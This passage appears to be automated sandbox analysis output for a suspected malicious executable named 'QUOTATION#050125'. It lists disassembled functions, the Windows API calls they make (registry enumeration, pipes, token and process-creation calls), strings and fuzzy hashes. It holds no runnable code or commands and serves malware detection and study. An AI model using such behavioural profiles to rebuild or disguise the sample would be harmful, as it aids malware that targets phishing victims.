                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0012778F
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00127792
                                                                                      • SysAllocString.OLEAUT32(?), ref: 001277B0
                                                                                      • SysFreeString.OLEAUT32(?), ref: 001277B9
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 001277DE
                                                                                      • SysAllocString.OLEAUT32(?), ref: 001277EC
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00127842
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00127868
                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0012786B
                                                                                      • SysAllocString.OLEAUT32 ref: 0012788C
                                                                                      • SysFreeString.OLEAUT32 ref: 00127895
                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 001278AF
                                                                                      • SysAllocString.OLEAUT32(?), ref: 001278BD
                                                                                      Similarity
                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                      • String ID:
                                                                                      • API String ID: 3761583154-0
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 001304F2
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0013052E
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 001305C6
                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00130601
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CreateHandlePipe
                                                                                      • String ID: nul
                                                                                      • API String ID: 1424370930-2873401336
                                                                                      • Opcode ID: 229484b413e76c7b237600f3efc7b1344ec7a4393b7a41b3b59423d1f7bb0d51
                                                                                      • Instruction ID: 155ae74feca98e453800ce45ff7101bff5b3f2ddf1ec756d9bc72578fef147db
                                                                                      • Opcode Fuzzy Hash: 229484b413e76c7b237600f3efc7b1344ec7a4393b7a41b3b59423d1f7bb0d51
                                                                                      • Instruction Fuzzy Hash: 8E21B6B5500305DFDB219F69CC55A9A77E8BF99B30F200B19F8A1E72E4E77099A0CB50
                                                                                      APIs
                                                                                        • Part of subcall function 000C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000C604C
                                                                                        • Part of subcall function 000C600E: GetStockObject.GDI32(00000011), ref: 000C6060
                                                                                        • Part of subcall function 000C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C606A
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00154112
                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0015411F
                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0015412A
                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00154139
                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00154145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                      • String ID: Msctls_Progress32
                                                                                      • API String ID: 1025951953-3636473452
                                                                                      • Opcode ID: 44b9338130ac7a3dad3041d40d04b5be3ff0d407451e54c7182dbd6684c95f1d
                                                                                      • Instruction ID: 7fa1a342841da37fea852ef565ae46693d5c9ecf4c18ad3c6412427958ec7553
                                                                                      • Opcode Fuzzy Hash: 44b9338130ac7a3dad3041d40d04b5be3ff0d407451e54c7182dbd6684c95f1d
                                                                                      • Instruction Fuzzy Hash: 8711B2B2140219BFEF119F64CC85EE77F9DEF18798F114111BA28A6190C772DC61DBA4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 0-537541572
                                                                                      • Opcode ID: 133f083dc24ae5d5e43332547e3cbcd34ac794ff1830837c89ea8e0f34002a32
                                                                                      • Instruction ID: 3a7e9ae8791b200823f4e057d04cc086ad83cb8a3408059d05df63db6e48da65
                                                                                      • Opcode Fuzzy Hash: 133f083dc24ae5d5e43332547e3cbcd34ac794ff1830837c89ea8e0f34002a32
                                                                                      • Instruction Fuzzy Hash: 2E11D873E05B91EFDB715B2A9C89A6A7FD49B017A0F150225E915BB391D730EF0085E0
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                      • String ID: 0.0.0.0
                                                                                      • API String ID: 348263315-3771769585
                                                                                      • Opcode ID: 3c7a45fb1af44fc18ec9180a76f4307ea18a8d5a1d082cdee1c8ae4d0c9a7ff2
                                                                                      • Instruction ID: 47812cca35bcafcb028ed85f54bf3c3a7e9909d4bf1d161a0f6da0069eb46505
                                                                                      • Opcode Fuzzy Hash: 3c7a45fb1af44fc18ec9180a76f4307ea18a8d5a1d082cdee1c8ae4d0c9a7ff2
                                                                                      • Instruction Fuzzy Hash: 33110A71504315AFDB24AF60FC0ADEE77ACDF15711F020169F445AA092EF718AC18AA0
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0012DA74
                                                                                      • LoadStringW.USER32(00000000), ref: 0012DA7B
                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0012DA91
                                                                                      • LoadStringW.USER32(00000000), ref: 0012DA98
                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0012DADC
                                                                                      Strings
                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0012DAB9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                      • API String ID: 4072794657-3128320259
                                                                                      • Opcode ID: acc24c99aee3ace133152996904fa33267099c1f2d02d06dce9d6a52beb15937
                                                                                      • Instruction ID: 78eb0b45c965ffbe37c210bee044b665fd8401d8b5230c93d391a7c72cebb541
                                                                                      • Opcode Fuzzy Hash: acc24c99aee3ace133152996904fa33267099c1f2d02d06dce9d6a52beb15937
                                                                                      • Instruction Fuzzy Hash: 170162F6500318BFE710ABA4ED89EEB326CE708306F404491B706E6041EA749E848FB4
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(00A7F0A0,00A7F0A0), ref: 0013097B
                                                                                      • EnterCriticalSection.KERNEL32(00A7F080,00000000), ref: 0013098D
                                                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 0013099B
                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 001309A9
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001309B8
                                                                                      • InterlockedExchange.KERNEL32(00A7F0A0,000001F6), ref: 001309C8
                                                                                      • LeaveCriticalSection.KERNEL32(00A7F080), ref: 001309CF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 3495660284-0
                                                                                      • Opcode ID: 3983d6e2fac9bc02f441799608a172fcc5c024d38e4ee20712033a7c805944e4
                                                                                      • Instruction ID: 43c5c5f7abc80535bf27e359d93da0cd1bce38b4868b5938310de4cf3721ecae
                                                                                      • Opcode Fuzzy Hash: 3983d6e2fac9bc02f441799608a172fcc5c024d38e4ee20712033a7c805944e4
                                                                                      • Instruction Fuzzy Hash: 2AF0CD31442B12EFD7525F94EE89BDA7A65FF05706F401015F10258CA1CB7594A5CFD0
                                                                                      APIs
                                                                                      • GetClientRect.USER32(?,?), ref: 000C5D30
                                                                                      • GetWindowRect.USER32(?,?), ref: 000C5D71
                                                                                      • ScreenToClient.USER32(?,?), ref: 000C5D99
                                                                                      • GetClientRect.USER32(?,?), ref: 000C5ED7
                                                                                      • GetWindowRect.USER32(?,?), ref: 000C5EF8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                      • String ID:
                                                                                      • API String ID: 1296646539-0
                                                                                      • Opcode ID: bf33e4a210cfdc4ee52079a21212455f98a967e19b1b1d5bd6d4ee396daa081c
                                                                                      • Instruction ID: e54b078a6e1da10e557f958f70b922ac0471bb1e978b059a782feb0031d4abfa
                                                                                      • Opcode Fuzzy Hash: bf33e4a210cfdc4ee52079a21212455f98a967e19b1b1d5bd6d4ee396daa081c
                                                                                      • Instruction Fuzzy Hash: 7BB14C78A0074ADBDB14CFA9C880BEEB7F1BF58311F14841EE999D7250D730AA91DB54
                                                                                      APIs
                                                                                      • GetMenu.USER32(?), ref: 00152183
                                                                                      • GetMenuItemCount.USER32(00000000), ref: 001521B5
                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001521DD
                                                                                      • GetMenuItemID.USER32(?,?), ref: 0015224D
                                                                                      • GetSubMenu.USER32(?,?), ref: 0015225B
                                                                                        • Part of subcall function 00123A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00123A57
                                                                                        • Part of subcall function 00123A3D: GetCurrentThreadId.KERNEL32 ref: 00123A5E
                                                                                        • Part of subcall function 00123A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001225B3), ref: 00123A65
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001522E3
                                                                                        • Part of subcall function 0012E97B: Sleep.KERNEL32 ref: 0012E9F3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2039446747-0
                                                                                      • Opcode ID: 0e9885adc8c028dd92bded8f6e63aa9d321a7970215dc517ca0ae18d661d9a4b
                                                                                      • Instruction ID: 936fcd5311247ee3161152232bd2fca4a8e1c0ca32aefea7a3efc42b8a3b7d82
                                                                                      • Opcode Fuzzy Hash: 0e9885adc8c028dd92bded8f6e63aa9d321a7970215dc517ca0ae18d661d9a4b
                                                                                      • Instruction Fuzzy Hash: E8718176A00205EFCB14DF64C885AAEB7F1EF49311F158469E826EF341D774EE458B90
                                                                                      APIs
                                                                                        • Part of subcall function 0014C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014BCCA
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0014BD25
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014BD6A
                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0014BD99
                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0014BDF3
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0014BDFF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                      • String ID:
                                                                                      • API String ID: 3451389628-0
                                                                                      • Opcode ID: 33a3ba48cd1aee0274fe9d18acbd6684e56a1b209b434e9dc7ce935bdf1e4f60
                                                                                      • Instruction ID: 93b73353a5ad5b78578e5b75113ca385663f30635170631e707224cc9d04f98f
                                                                                      • Opcode Fuzzy Hash: 33a3ba48cd1aee0274fe9d18acbd6684e56a1b209b434e9dc7ce935bdf1e4f60
                                                                                      • Instruction Fuzzy Hash: 6E815870608241AFD714DF64C8D5E6ABBE5FF84308F14899CF4598B2A2DB32ED45CB92
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000035), ref: 0011F7B9
                                                                                      • SysAllocString.OLEAUT32(00000001), ref: 0011F860
                                                                                      • VariantCopy.OLEAUT32(0011FA64,00000000), ref: 0011F889
                                                                                      • VariantClear.OLEAUT32(0011FA64), ref: 0011F8AD
                                                                                      • VariantCopy.OLEAUT32(0011FA64,00000000), ref: 0011F8B1
                                                                                      • VariantClear.OLEAUT32(?), ref: 0011F8BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                                                      • String ID:
                                                                                      • API String ID: 3859894641-0
                                                                                      • Opcode ID: 50302d5a4031289d639f990a10ad0c8f2548da661ab531e5428f998f31ebea0b
                                                                                      • Instruction ID: 2992341bb49fbbb7f6dca69eea46391a9ace7a0f05503d457158162ceb60f2be
                                                                                      • Opcode Fuzzy Hash: 50302d5a4031289d639f990a10ad0c8f2548da661ab531e5428f998f31ebea0b
                                                                                      • Instruction Fuzzy Hash: 7251D531500314BACF18AF65D895BA9B3A5EF55314F24847FF806DF292DB708C85CBA6
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • BeginPaint.USER32(?,?,?), ref: 000D9241
                                                                                      • GetWindowRect.USER32(?,?), ref: 000D92A5
                                                                                      • ScreenToClient.USER32(?,?), ref: 000D92C2
                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 000D92D3
                                                                                      • EndPaint.USER32(?,?,?,?,?), ref: 000D9321
                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001171EA
                                                                                        • Part of subcall function 000D9339: BeginPath.GDI32(00000000), ref: 000D9357
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                      • String ID:
                                                                                      • API String ID: 3050599898-0
                                                                                      • Opcode ID: c0dde96bb26a5ab6da80b49bb6d34a42260cc9956b43bde0c08b2060d6a9af77
                                                                                      • Instruction ID: fe58bf18ef468a28c720816b4975a0ba12778f7b0172ea05f48cfa81f726611f
                                                                                      • Opcode Fuzzy Hash: c0dde96bb26a5ab6da80b49bb6d34a42260cc9956b43bde0c08b2060d6a9af77
                                                                                      • Instruction Fuzzy Hash: 75419A70108301EFD721DF24CC84FBA7BB8EB59725F14062AF9A59B2E2C7319985DB61
                                                                                      APIs
                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0013080C
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00130847
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00130863
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 001308DC
                                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001308F3
                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00130921
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                      • String ID:
                                                                                      • API String ID: 3368777196-0
                                                                                      • Opcode ID: f9696f027b77824f41cdf20a0ef6920648bed7083f420efffd5b00e1f58b5089
                                                                                      • Instruction ID: 9b8bf10acc6a2c636bea4ccf6c89fe996cad8873df4d5f84b07060516f36b075
                                                                                      • Opcode Fuzzy Hash: f9696f027b77824f41cdf20a0ef6920648bed7083f420efffd5b00e1f58b5089
                                                                                      • Instruction Fuzzy Hash: 59415871900305EFDF159F54DC85AAA77B8FF08300F1480A5E905AA29BDB70DEA0DBA0
                                                                                      APIs
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0011F3AB,00000000,?,?,00000000,?,0011682C,00000004,00000000,00000000), ref: 0015824C
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00158272
                                                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 001582D1
                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 001582E5
                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0015830B
                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0015832F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 642888154-0
                                                                                      • Opcode ID: 6f9441cb30a9e3c2db0e3ba51e875167f790f32ca589b125dd6ea5847cdf9bc6
                                                                                      • Instruction ID: 978aa05f20b3c989f60731ed994b4721ac9b9a1b68464a62cccaf19999193766
                                                                                      • Opcode Fuzzy Hash: 6f9441cb30a9e3c2db0e3ba51e875167f790f32ca589b125dd6ea5847cdf9bc6
                                                                                      • Instruction Fuzzy Hash: 2A41B430601745EFDF12DF15C899BE47BF1FB0A716F184169E9289F662CB31A889CB50
                                                                                      APIs
                                                                                        • Part of subcall function 00120FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00120FCA
                                                                                        • Part of subcall function 00120FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00120FD6
                                                                                        • Part of subcall function 00120FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00120FE5
                                                                                        • Part of subcall function 00120FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00120FEC
                                                                                        • Part of subcall function 00120FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00121002
                                                                                      • GetLengthSid.ADVAPI32(?,00000000,00121335), ref: 001217AE
                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001217BA
                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 001217C1
                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 001217DA
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00121335), ref: 001217EE
                                                                                      • HeapFree.KERNEL32(00000000), ref: 001217F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                      • String ID:
                                                                                      • API String ID: 3008561057-0
                                                                                      • Opcode ID: c04f5c9b13312f08b4d3a402fbbac83fe7326c350e97db0d274652ca4fabc9cc
                                                                                      • Instruction ID: 0c5800aaaefb06f968b2cb46d916b8a7412ab1525de1c3831444a0ea47b257d5
                                                                                      • Opcode Fuzzy Hash: c04f5c9b13312f08b4d3a402fbbac83fe7326c350e97db0d274652ca4fabc9cc
                                                                                      • Instruction Fuzzy Hash: 8611BE32500715FFDB10DFA4EC89BAF7BA9EB95356F104018F4419B211D735A990CBA0
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 001214FF
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00121506
                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00121515
                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00121520
                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0012154F
                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00121563
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
